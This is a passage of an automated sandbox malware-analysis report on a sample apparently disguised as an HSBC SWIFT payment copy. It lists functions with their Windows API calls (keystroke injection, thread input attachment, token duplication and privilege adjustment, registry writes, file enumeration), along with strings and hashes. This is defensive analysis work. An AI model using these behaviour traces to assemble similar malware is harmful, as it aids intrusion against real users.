Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 6dafacd068ed9d70579a6d235c22d071613570da06ecd7c578244cdbbd3cb1d9
Instruction ID: 971183d1371e71fe397cc4d6d0bc540be02ce8f5f84b09f0dca3ad62aa3997f2
Opcode Fuzzy Hash: 6dafacd068ed9d70579a6d235c22d071613570da06ecd7c578244cdbbd3cb1d9
Instruction Fuzzy Hash: E8F0CD71901649EBDF51AFB48C0E7EE36A4EF02325F158414F424AA292CBBC9A51EF52

Function 00724E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E7E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4ce499c41b806fc7d0288b8af1235d218b2244fd2d472a141229ac79f8c911c1
Instruction ID: b58b608795ae723cb0b4c77c348d5881117360109fa07e24db9bef7800e3c05e
Opcode Fuzzy Hash: 4ce499c41b806fc7d0288b8af1235d218b2244fd2d472a141229ac79f8c911c1
Instruction Fuzzy Hash: 25F03971901721DFEB349F64E494812BBE1BF543293218A3EE2D682620C73A9880DF40

Function 00740791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007407B0

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d996296bcc95d46d488729269a4093839d06bb9761a5830b55619a407c540892
Instruction ID: 00e6c2819ecb5377d022596d898b45a1c63caab4c2ce78e30fd29075f95fddc6
Opcode Fuzzy Hash: d996296bcc95d46d488729269a4093839d06bb9761a5830b55619a407c540892
Instruction Fuzzy Hash: 37E0CD769051285BC720D6989C09FEA77DDEFC97A1F0441B5FC0CD7254D9A4AC8086D0

Function 0074525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00745266

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: c281e31fa6468f0370b3be672687effa3ab77d10d2f18ad829591410af1d8b9b
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 93B092B644020CB7CE012A82EC02A493B19AB41764F408021FB0C18162A6B7A6649A89

Function 00740C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00740CB7

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: aa2bf1930eddcf8655d7b0ab54bfaa3fcf9cbce96e1b3f524a715343ac081de0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: CA31A070A00105DBC718DF58D4C4AA9F7B6FB99300B6486A5E90ACB355DB35EDC1EBE0

Function 01F822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01F822B1

Memory Dump Source

Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 9bd4cca6622812f4062439cb4a0fb7d39a7a3d65c57acb1b8186730a5111c175
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 82E0E67494010EDFDB00EFB8D54969E7FB4EF04301F100161FD01D2281D6319D50CA72

Non-executed Functions

Function 007ACABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007ACB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007ACB95
GetWindowLongW.USER32(?,000000F0), ref: 007ACBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007ACC00
SendMessageW.USER32 ref: 007ACC29
_wcsncpy.LIBCMT ref: 007ACC95
GetKeyState.USER32(00000011), ref: 007ACCB6
GetKeyState.USER32(00000009), ref: 007ACCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007ACCD9
GetKeyState.USER32(00000010), ref: 007ACCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007ACD0C
SendMessageW.USER32 ref: 007ACD33
SendMessageW.USER32(?,00001030,?,007AB348), ref: 007ACE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007ACE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007ACE60
SetCapture.USER32(?), ref: 007ACE69
ClientToScreen.USER32(?,?), ref: 007ACECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007ACEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007ACEF5
ReleaseCapture.USER32 ref: 007ACF00
GetCursorPos.USER32(?), ref: 007ACF3A
ScreenToClient.USER32(?,?), ref: 007ACF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 007ACFA3
SendMessageW.USER32 ref: 007ACFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 007AD00E
SendMessageW.USER32 ref: 007AD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007AD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007AD06D
GetCursorPos.USER32(?), ref: 007AD08D
ScreenToClient.USER32(?,?), ref: 007AD09A
GetParent.USER32(?), ref: 007AD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 007AD123
SendMessageW.USER32 ref: 007AD154
ClientToScreen.USER32(?,?), ref: 007AD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007AD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 007AD20C
SendMessageW.USER32 ref: 007AD22F
ClientToScreen.USER32(?,?), ref: 007AD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007AD2B5

Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC

GetWindowLongW.USER32(?,000000F0), ref: 007AD351

Strings

pb~, xrefs: 007ACEAF
@GUI_DRAGID, xrefs: 007ACE9C
F, xrefs: 007AD235

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb~
API String ID: 3977979337-3050743794
Opcode ID: 34b0f2391d07aa0a7e20c60964faf453f7907629eb4039e9245d2ddd630d804b
Instruction ID: 27d4e3264d7631bafbd3d2af3f68685176f3919dca27e96e7f196150b0a83997
Opcode Fuzzy Hash: 34b0f2391d07aa0a7e20c60964faf453f7907629eb4039e9245d2ddd630d804b
Instruction Fuzzy Hash: AB42AF74204280EFDB25CF64C888BAABBE5FF8A314F144619F565872B1C739DC50DBA6

Function 00736F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007371C3
_memset.LIBCMT ref: 00737539
_memmove.LIBCMT ref: 007376AC

Strings

\b(?=\w), xrefs: 00773769
P\}, xrefs: 00771AB8
_s, xrefs: 007723CB
DEFINE, xrefs: 00772103
3cs, xrefs: 007723A0
]}, xrefs: 00771A22
\b(?<=\w), xrefs: 00773773
[:<:]], xrefs: 00737479
Q\E, xrefs: 00737FCB
[:>:]], xrefs: 00737492

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]}$3cs$DEFINE$P\}$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_s
API String ID: 1357608183-3017454739
Opcode ID: 26654ad50f92ec171f00547bfbe0190eefbf17b89ed6d8dacd836f2106cd21f9
Instruction ID: c13fc5d2a6ecb38c989e7592e2bde09b97ee6765bbccf3ce95f2538be185b038
Opcode Fuzzy Hash: 26654ad50f92ec171f00547bfbe0190eefbf17b89ed6d8dacd836f2106cd21f9
Instruction Fuzzy Hash: 0893B471A00219DFDF28CF58C881BADB7B1FF48350F25C16AE959AB281E7789D81DB50

Function 007248D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 007248DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0075D665
IsIconic.USER32(?), ref: 0075D66E
ShowWindow.USER32(?,00000009), ref: 0075D67B
SetForegroundWindow.USER32(?), ref: 0075D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075D69B
GetCurrentThreadId.KERNEL32 ref: 0075D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0075D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0075D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0075D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0075D6CF
SetForegroundWindow.USER32(?), ref: 0075D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D6E7
keybd_event.USER32(00000012,00000000), ref: 0075D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D6FC
keybd_event.USER32(00000012,00000000), ref: 0075D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D70A
keybd_event.USER32(00000012,00000000), ref: 0075D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075D719
keybd_event.USER32(00000012,00000000), ref: 0075D71E
SetForegroundWindow.USER32(?), ref: 0075D721
AttachThreadInput.USER32(?,?,00000000), ref: 0075D748

Strings

Shell_TrayWnd, xrefs: 0075D660

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a2b4c779d43fb32e16446bf8b31607af77205523ebc4c9efbc9b8f7732e6cce8
Instruction ID: 5a865aa862253fd5f67b470102d558b2db5b270bc985474e439bdd18780fe76c
Opcode Fuzzy Hash: a2b4c779d43fb32e16446bf8b31607af77205523ebc4c9efbc9b8f7732e6cce8
Instruction Fuzzy Hash: A1319571A40318BBEB305FA19C49FBF3E6CEB85B51F104025FA04EA1D1C6B45D11ABA5

Function 00778310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 007787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
Part of subcall function 007787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
Part of subcall function 007787E1: GetLastError.KERNEL32 ref: 00778865

_memset.LIBCMT ref: 00778353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007783A5
CloseHandle.KERNEL32(?), ref: 007783B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007783CD
GetProcessWindowStation.USER32 ref: 007783E6
SetProcessWindowStation.USER32(00000000), ref: 007783F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0077840A

Part of subcall function 007781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00778309), ref: 007781E0
Part of subcall function 007781CB: CloseHandle.KERNEL32(?,?,00778309), ref: 007781F2

Strings

winsta0, xrefs: 007783C8
default, xrefs: 00778405
, xrefs: 00778362

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: b37d9db67e1b46f5fc5998d2584d9cc6daf08b1f5f27e81e7aad934eb7b21271
Instruction ID: b7daf255628435ca3333831cc587c24f26d83c05904095ee47e019514bd2c122
Opcode Fuzzy Hash: b37d9db67e1b46f5fc5998d2584d9cc6daf08b1f5f27e81e7aad934eb7b21271
Instruction Fuzzy Hash: 1F818D71940209EFDF51DFA4CC49AEE7B79FF04384F248169F918A2261DB398E24DB21

Function 0078C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0078C78D
FindClose.KERNEL32(00000000), ref: 0078C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0078C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0078C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0078C844
__swprintf.LIBCMT ref: 0078C890
__swprintf.LIBCMT ref: 0078C8D3

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

__swprintf.LIBCMT ref: 0078C927

Part of subcall function 00743698: __woutput_l.LIBCMT ref: 007436F1

__swprintf.LIBCMT ref: 0078C975

Part of subcall function 00743698: __flsbuf.LIBCMT ref: 00743713
Part of subcall function 00743698: __flsbuf.LIBCMT ref: 0074372B

__swprintf.LIBCMT ref: 0078C9C4
__swprintf.LIBCMT ref: 0078CA13
__swprintf.LIBCMT ref: 0078CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0078C88A
%4d, xrefs: 0078C8CD
%02d, xrefs: 0078C91B, 0078C925, 0078C973, 0078C9C2, 0078CA11, 0078CA60

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 1ae4501f25c7ac80931181d6d4fd67d7e5bc40f8533f4482e61f951e620856e9
Instruction ID: ba3f7cc1c2fe3f0cd2b6bf35acbf8028d78e7e13312dfd07120fc3c507618d4a
Opcode Fuzzy Hash: 1ae4501f25c7ac80931181d6d4fd67d7e5bc40f8533f4482e61f951e620856e9
Instruction Fuzzy Hash: B3A13BB1508355EBC744EBA4D889DAFB7ECFF85700F44491AF585C6191EA38EA08CB62

Function 0078EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0078EFB6
_wcscmp.LIBCMT ref: 0078EFCB
_wcscmp.LIBCMT ref: 0078EFE2
GetFileAttributesW.KERNEL32(?), ref: 0078EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0078F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0078F026
FindClose.KERNEL32(00000000), ref: 0078F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0078F04D
_wcscmp.LIBCMT ref: 0078F074
_wcscmp.LIBCMT ref: 0078F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0078F09D
SetCurrentDirectoryW.KERNEL32(007D8920), ref: 0078F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0078F0C5
FindClose.KERNEL32(00000000), ref: 0078F0D2
FindClose.KERNEL32(00000000), ref: 0078F0E4

Strings

*.*, xrefs: 0078F048

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 4d55ce47bf625e282e4e82e4110080dd4728dba26eb8981032b37da6921e34ff
Instruction ID: 7349fc3bd5f4ad95788c5113dd8f8068514cc64a27d92c12ca38b53c990fade9
Opcode Fuzzy Hash: 4d55ce47bf625e282e4e82e4110080dd4728dba26eb8981032b37da6921e34ff
Instruction Fuzzy Hash: 6431D532541218AEDB14EFF4DC48BEEB7ACAF89360F104276E844E2191DB78DE44CB65

Function 007A0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,007AF910,00000000,?,00000000,?,?), ref: 007A09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007A0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007A0A92
RegCloseKey.ADVAPI32(?), ref: 007A0DB2
RegCloseKey.ADVAPI32(00000000), ref: 007A0DBF

Strings

REG_SZ, xrefs: 007A0AD0
REG_DWORD, xrefs: 007A0C83
REG_EXPAND_SZ, xrefs: 007A0A2F
REG_BINARY, xrefs: 007A0D4D
REG_MULTI_SZ, xrefs: 007A0B7A
REG_QWORD, xrefs: 007A0D00

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 62f4728737e2b0314c353535b9ad08e91fd7a8d78fb236d92e76f08855711f05
Instruction ID: 6497ae85d410480ccb5470f5a356b5ecc1cf75452cddf73a65d12165ed212309
Opcode Fuzzy Hash: 62f4728737e2b0314c353535b9ad08e91fd7a8d78fb236d92e76f08855711f05
Instruction Fuzzy Hash: B2023975600611DFCB14EF24D859E2AB7E5EF8A310F08895DF9899B362DB38EC41CB85

Function 007366E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

0D|, xrefs: 00736733
_s, xrefs: 00771465, 0077150C, 007715B4
LIMIT_RECURSION=, xrefs: 007711FC
UCP), xrefs: 0077110D
UTF16), xrefs: 007710CF
LF), xrefs: 007712A4
pG|, xrefs: 00736751
3cs, xrefs: 007368FF
UTF), xrefs: 007710FA
0F|, xrefs: 00736747
ANYCRLF), xrefs: 007712FB
CRLF), xrefs: 007712C1
LIMIT_MATCH=, xrefs: 00771170
NO_START_OPT), xrefs: 0077114F
BSR_ANYCRLF), xrefs: 0077131E
NO_AUTO_POSSESS), xrefs: 0077112E
CR), xrefs: 00771287
0E|, xrefs: 0073673D
BSR_UNICODE), xrefs: 00771338
ANY), xrefs: 007712DE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID: 0D|$0E|$0F|$3cs$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG|$_s
API String ID: 0-3244020149
Opcode ID: 24a8c839b99452c70a4f86b7242eca7867018927754966b49cb8775799ae5b2b
Instruction ID: abc8e0bb9b6b57f854f9bbf6022517075a25cb87edadb4fb801b502b587c407e
Opcode Fuzzy Hash: 24a8c839b99452c70a4f86b7242eca7867018927754966b49cb8775799ae5b2b
Instruction Fuzzy Hash: 407260B5E00219DBDF14CF58C8807ADB7B5FF44750F64C16AE949EB291EB389A41CB90

Function 0078F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0078F113
_wcscmp.LIBCMT ref: 0078F128
_wcscmp.LIBCMT ref: 0078F13F

